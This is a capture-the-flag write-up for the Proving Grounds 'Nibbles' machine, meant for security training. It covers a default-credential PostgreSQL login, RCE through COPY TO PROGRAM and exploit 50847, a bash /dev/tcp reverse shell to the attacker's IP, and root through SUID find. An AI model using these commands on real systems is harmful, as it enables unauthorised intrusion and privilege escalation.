Nibbles

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.215.47
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-07 20:21 EST
Nmap scan report for 192.168.215.47                                                                                                                                        
Host is up, received echo-reply ttl 61 (0.15s latency).                                                                                                                    
Scanned at 2025-11-07 20:21:08 EST for 49s                                                                                                                                 
Not shown: 65529 filtered tcp ports (no-response)                                                                                                                          
PORT     STATE  SERVICE      REASON         VERSION                                                                                                                        
21/tcp   open   ftp          syn-ack ttl 61 vsftpd 3.0.3                                                                                                                   
22/tcp   open   ssh          syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)                                                                                 
| ssh-hostkey:                                                                                                                                                             
|   2048 10:62:1f:f5:22:de:29:d4:24:96:a7:66:c3:64:b7:10 (RSA)                                                                                                             
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJgyzpWrB8SyLb/XmPYQYzsnfizW7d0aNZHpwQ9ivcHQ/RYLbCc8yUIQGN2JMqCgfSj8CRMA36UnV8jnngjkw9njcgMyA5qc1mO4tzzH7VNkW2t5AmP7Q1HBt+SThlLa0Jx
BN6Gd5BOPwrsk9YTjLj8ax2ncvGBq8jzQjYmm9jF4VgBak5DY+Q5JWdf9krumSlR+V8yneV9aQ6sVy2XgkCJQLQ8GoUTm/13XUTc3TCKQ2KOJ2FzA8VcNTfxqTDxalwnYrZ1tod7BRfMeff5MwxC5gzeB+hdOVC0zAZlvNtMxH6
SCxMBRCoX9IHL27E6WtSGXCj1SLYJWrFImjp+I1L                                                                                                                                   
|   256 c9:15:ff:cd:f3:97:ec:39:13:16:48:38:c5:58:d7:5f (ECDSA)                                                                                                            
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM7uIYLogPsKP+c0QrezqQfB94ml7djfUOtG8ZAoMX6yK898l0TbgyAShcQSmdOsSMGdSO4GZpixCFJdsYkBi0M=         
|   256 90:7c:a3:44:73:b4:b4:4c:e3:9c:71:d1:87:ba:ca:7b (ED25519)                                                                                                          
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKoHnGdMtb37ORTRBt2cTfWvQE7IB3fF3ewP/1tqn0JF                                                                                         
80/tcp   open   http         syn-ack ttl 61 Apache httpd 2.4.38 ((Debian))                                                                                                 
|_http-title: Enter a title, displayed at the top of the window.                                                                                                           
| http-methods:                                                                                                                                                            
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.38 (Debian)
5437/tcp open   postgresql   syn-ack ttl 61 PostgreSQL DB 11.3 - 11.9
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Issuer: commonName=debian
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-04-27T15:41:47
| Not valid after:  2030-04-25T15:41:47
| MD5:   b086:6d30:4913:684e:16c1:8348:fc76:fe43
| SHA-1: cb30:5109:0fc1:14ab:0fb9:8e55:5874:4bb5:ba57:66af
| -----BEGIN CERTIFICATE-----
| MIIC0DCCAbigAwIBAgIUYoM4kALX3eWKWuCQ1/K5FujVbGowDQYJKoZIhvcNAQEL
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

<snipped>

This time we have postgresql service running on port 5437.

I enumerated all other services but nothing lead to find anything useful except for postgresql.

Postgresql (5437):

We can interact with postgresql through the command line tool called psql.

I tried some different combinations of default credentials such as admin:admin, etc. postgres:postgres worked for me:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ psql -h 192.168.215.47 -p 5437 -U postgres                   
Password for user postgres: postgres
psql (17.6 (Debian 17.6-1), server 11.7 (Debian 11.7-0+deb10u1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, compression: off, ALPN: none)
Type "help" for help.

postgres=#

I did not find anything interesting in the databases.

Exploitation:

From the nmap result we can guess the version of this service is between 11.3 to 11.9.

I searched for public exploits, and found that we can get command execution:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]                                                                                                                   
└─$ searchsploit postgresql 11.                                                                                                                                            
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                           |  Path                           
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)                                                                        | multiple/remote/50847.py
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]                                                                                                                   
└─$ searchsploit -m 50847                                                                                                                                                  
  Exploit: PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)         
      URL: https://www.exploit-db.com/exploits/50847                                                                                                                       
     Path: /usr/share/exploitdb/exploits/multiple/remote/50847.py                                                                                                          
    Codes: CVE-2019–9193                                                                                                                                                   
 Verified: False                                                                     
File Type: Python script, Unicode text, UTF-8 text executable                        
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Nibbles/50847.py

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ python3 50847.py -i 192.168.215.47 -p 5437 -c whoami -U postgres -P postgres

[+] Connecting to PostgreSQL Database on 192.168.215.47:5437
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 11.7 is likely vulnerable
[+] Creating table _121e8b8e5b4598406bf35c942ae58806
[+] Command executed

postgres

[+] Deleting table _121e8b8e5b4598406bf35c942ae58806

Or we can perform it manually ourselves, using the copy to/from program query.

PayloadsAllTheThings/SQL Injection/PostgreSQL Injection.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

First lets confirm we have command execution:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes

And send icmp packets through ping command:

postgres=# COPY (SELECT '') to PROGRAM 'ping 192.168.45.174 -c 3';
COPY 1

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
20:36:39.391134 IP 192.168.215.47 > 192.168.45.174: ICMP echo request, id 1225, seq 1, length 64
20:36:39.391163 IP 192.168.45.174 > 192.168.215.47: ICMP echo reply, id 1225, seq 1, length 64
20:36:40.390572 IP 192.168.215.47 > 192.168.45.174: ICMP echo request, id 1225, seq 2, length 64
20:36:40.391067 IP 192.168.45.174 > 192.168.215.47: ICMP echo reply, id 1225, seq 2, length 64
20:36:41.392266 IP 192.168.215.47 > 192.168.45.174: ICMP echo request, id 1225, seq 3, length 64
20:36:41.392288 IP 192.168.45.174 > 192.168.215.47: ICMP echo reply, id 1225, seq 3, length 64
^C
6 packets captured
6 packets received by filter
0 packets dropped by kernel

Indeed we have blind RCE.

Get a reverse shell, I will use one of the exposed ports with netcat to avoid firewall issues with ports:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ nc -nlvp 80
listening on [any] 80 ...

postgres=# COPY (SELECT '') to PROGRAM 'bash -c "bash -i >& /dev/tcp/192.168.45.174/80 0>&1"';

Going back to our netcat listener:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.174] from (UNKNOWN) [192.168.215.47] 46054
bash: cannot set terminal process group (1219): Inappropriate ioctl for device
bash: no job control in this shell
postgres@nibbles:/var/lib/postgresql/11/main$

Stabilize our shell:

postgres@nibbles:/var/lib/postgresql/11/main$ which python3
which python3
/usr/bin/python3
postgres@nibbles:/var/lib/postgresql/11/main$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<ain$ python3 -c 'import pty;pty.spawn("/bin/bash")'
postgres@nibbles:/var/lib/postgresql/11/main$ export TERM=xterm
export TERM=xterm
postgres@nibbles:/var/lib/postgresql/11/main$ ^Z
zsh: suspended  nc -nlvp 80

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ stty raw -echo ; fg
[1]  + continued  nc -nlvp 80

postgres@nibbles:/var/lib/postgresql/11/main$ stty rows 43 columns 171
postgres@nibbles:/var/lib/postgresql/11/main$

Post-Exploitation:

After enumerating the system a bit, we will find that we have find as one of the suid binaries that we can leverage to escalate our privileges:

postgres@nibbles:/home/wilson$ find / -perm -u=s -type f 2>/dev/null | grep -v snap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/find
/usr/bin/sudo
/usr/bin/umount

find | GTFOBinsgtfobins.github.io

postgres@nibbles:/home/wilson$ find . -exec /bin/sh -p \; -quit
# whoami
root

Get the flags:

# cd /root
# ls -la
total 28
drwx------  4 root root 4096 Nov  7 20:18 .
drwxr-xr-x 18 root root 4096 Apr 27  2020 ..
-rw-------  1 root root    0 Jul 20  2020 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwx------  3 root root 4096 Apr 27  2020 .gnupg
drwxr-xr-x  3 root root 4096 Apr 27  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   33 Nov  7 20:18 proof.txt
# cat proof.txt
b7a118cd966e295abf24ef1bc548ec98
# cat /home/wilson/local.txt
d04650dc3e507d3706f9d66381a02a90